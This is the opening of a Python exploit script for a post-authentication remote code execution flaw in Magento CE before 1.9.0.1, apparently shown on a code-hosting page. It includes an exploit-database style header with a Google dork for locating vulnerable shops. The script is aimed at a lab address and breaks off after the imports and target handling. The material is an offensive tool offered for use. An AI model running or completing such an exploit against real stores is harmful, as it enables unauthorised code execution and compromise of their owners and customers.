This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE | |
# Google Dork: "Powered by Magento" | |
# Date: 08/18/2015 | |
# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com | |
# Vendor Homepage: http://magento.com/ | |
# Software Link: https://www.magentocommerce.com/download | |
# Version: 1.9.0.1 and below | |
# Tested on: Ubuntu 15 | |
# CVE : none |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import base64 | |
import sys | |
target = "http://10.10.10.140/index.php" | |
if not target.startswith("http"): | |
target = "http://" + target | |
if target.endswith("/"): |